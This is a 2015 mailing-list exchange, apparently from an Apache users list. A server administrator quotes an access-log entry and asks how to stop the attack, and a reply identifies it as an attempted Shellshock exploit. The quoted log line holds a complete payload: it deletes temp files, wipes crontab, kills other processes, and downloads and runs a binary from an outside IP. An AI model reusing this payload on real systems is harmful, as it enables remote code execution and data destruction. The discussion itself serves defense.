On Thu, Jul 2, 2015 at 8:29 AM, Victor Sterpu <victor@xxxxxxxx> wrote:
> In the end the attack was succesfull. Log show the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-"
> "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts, is there something
> I can do to allow only local scripts to be executed?
>
That doesn't imply it ran, that's a malicious URL. Read up on
shellshock which is the vuln they'e _trying_ to trigger.
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
|